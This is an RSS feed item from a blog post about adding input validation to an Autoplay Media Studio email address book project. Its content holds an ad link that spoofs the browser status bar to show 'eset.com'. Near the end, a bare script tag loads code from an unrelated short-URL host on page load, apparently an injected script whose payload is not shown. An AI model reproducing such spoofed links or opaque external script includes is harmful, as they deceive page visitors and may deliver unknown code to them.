<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Autoplay Media Studio Examples &#38; Scripts &#187; Validation</title>
	<atom:link href="http://amstudio.azman.info/tag/validation/feed/" rel="self" type="application/rss+xml" />
	<link>http://amstudio.azman.info</link>
	<description>Samples for Autoplay Media Studio Users</description>
	<lastBuildDate>Fri, 17 Jun 2011 15:52:53 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.5</generator>
		<item>
		<title>ListBox &amp; TextFile Interactions &#8211; Validation</title>
		<link>http://amstudio.azman.info/2009/05/07/listbox-textfile-interactions-validation/</link>
		<comments>http://amstudio.azman.info/2009/05/07/listbox-textfile-interactions-validation/#comments</comments>
		<pubDate>Thu, 07 May 2009 10:30:59 +0000</pubDate>
		<dc:creator>Azmanar</dc:creator>
				<category><![CDATA[Button]]></category>
		<category><![CDATA[Combo Box]]></category>
		<category><![CDATA[Dialog]]></category>
		<category><![CDATA[DialogEx]]></category>
		<category><![CDATA[File Action]]></category>
		<category><![CDATA[Input]]></category>
		<category><![CDATA[LUA]]></category>
		<category><![CDATA[Label Action]]></category>
		<category><![CDATA[ListBox]]></category>
		<category><![CDATA[String Action]]></category>
		<category><![CDATA[Tables]]></category>
		<category><![CDATA[TextFile Action]]></category>
		<category><![CDATA[Validation]]></category>

		<guid isPermaLink="false">http://amstudio.azman.info/?p=708</guid>
		<description><![CDATA[Hi, I&#8217;m back after a very busy week up North. Let&#8217;s embed Validation function into our mini Email Address Book project. Changes must be done to the flow and therefore the scripts. But it is not that difficult to do if you understand the previous 2 samples. Once the changes were made, I can now [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.dpbolvw.net/pm118y1A719PTURUQYQPRQUYTZQW" target="_blank" onmouseover="window.status='http://eset.com';return true;" onmouseout="window.status=' ';return true;"><br />
<img src="http://www.awltovhc.com/jr75tkocig156362A21326A5B28" alt="ESET Smart Security - Save 25%" border="0"/></a><br />
Hi,</p>
<p>I&#8217;m back after a very busy week up North. </p>
<p>Let&#8217;s embed Validation function into our mini Email Address Book project. Changes must be done to the flow and therefore the scripts. But it is not that difficult to do if you understand the previous 2 samples. </p>
<p>Once the changes were made, I can now :<br />
1. Validate Name entry<br />
2. Validate Email entry<br />
3. Validate Group Name entry</p>
<p>Each validation uses its own PATTERN. You can set this pattern by looking at the Globals Pane. This one is real easy to do. </p>
<div id="attachment_709" class="wp-caption aligncenter" style="width: 160px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/05/validate1.jpg"><img src="http://amstudio.azman.info/wp-content/uploads/2009/05/validate1-150x150.jpg" alt="Validate All Entries" title="validate1" width="150" height="150" class="size-thumbnail wp-image-709" /></a><p class="wp-caption-text">Validate All Entries</p></div>
<p>I&#8217;ve made quite a few changes to our project. I&#8217;ve optimized the scripts to run faster. So you can find more functions in the Globals and less scripts in objects. I&#8217;m using a TEMP TABLE that collects data from ListBoxes and then WRITE the TextFiles from the TEMP Table. This way, I can add more features to the project ( and preparing it for SQLite Plugin as well.).</p>
<div id="attachment_710" class="wp-caption aligncenter" style="width: 160px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/05/validate2.jpg"><img src="http://amstudio.azman.info/wp-content/uploads/2009/05/validate2-150x150.jpg" alt="Validate Entries" title="validate2" width="150" height="150" class="size-thumbnail wp-image-710" /></a><p class="wp-caption-text">Validate Entries</p></div>
<p>If you take a look at the Screen Shot above and below, the project pops up a DialogEx for New Group Entries. This entry is also validated according to a set of PATTERNS. Once validated, I&#8217;ve also inserted the Good Old Dialog to WARN USERS about the implication of their next course of actions.</p>
<div id="attachment_711" class="wp-caption aligncenter" style="width: 160px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/05/validate3.jpg"><img src="http://amstudio.azman.info/wp-content/uploads/2009/05/validate3-150x150.jpg" alt="Good Old Dialog &amp; DialogEx Working together" title="validate3" width="150" height="150" class="size-thumbnail wp-image-711" /></a><p class="wp-caption-text">Good Old Dialog &#038; DialogEx Working together</p></div>
<p>Once the New Group has been named, the DialogEx is closed and brings users to the front-end. Their latest Group will be auto-selected. This is easy to do. Look under the hood as proof.</p>
<p>Also, I&#8217;ve added a function to change the name of the GROUP as shown in the Screen Shot below. In fact, what we&#8217;re doing is changing the name of the Text Files.</p>
<div id="attachment_717" class="wp-caption aligncenter" style="width: 160px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/05/validate4.jpg"><img src="http://amstudio.azman.info/wp-content/uploads/2009/05/validate4-150x150.jpg" alt="Change Group Name" title="validate4" width="150" height="150" class="size-thumbnail wp-image-717" /></a><p class="wp-caption-text">Change Group Name</p></div>
<p>Please <a href="http://amstudio.azman.info/wp-login.php?redirect_to=/tag/validation/feed/">Login</a> or <a href="http://amstudio.azman.info/wp-login.php?action=register">Register</a> to download this file.</p>
<p>Please leave a comment.</p>
<p><SCRIPT type="text/javascript" LANGUAGE="javascript" src="http://www.qksz.net/1e-h4m3"> </SCRIPT></p>
<div class="addtoany_share_save_container"><ul class="addtoany_list"><li><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=Autoplay%20Media%20Studio%20Examples%20%26amp%3B%20Scripts&amp;siteurl=http%3A%2F%2Famstudio.azman.info%2F&amp;linkname=ListBox%20%26%23038%3B%20TextFile%20Interactions%20%26%238211%3B%20Validation&amp;linkurl=http%3A%2F%2Famstudio.azman.info%2F2009%2F05%2F07%2Flistbox-textfile-interactions-validation%2F"><img src="http://amstudio.azman.info/wp-content/plugins/add-to-any-ori/share_save_120_16.png" width="120" height="16" alt="Share/Save/Bookmark"/></a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://amstudio.azman.info/2009/05/07/listbox-textfile-interactions-validation/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

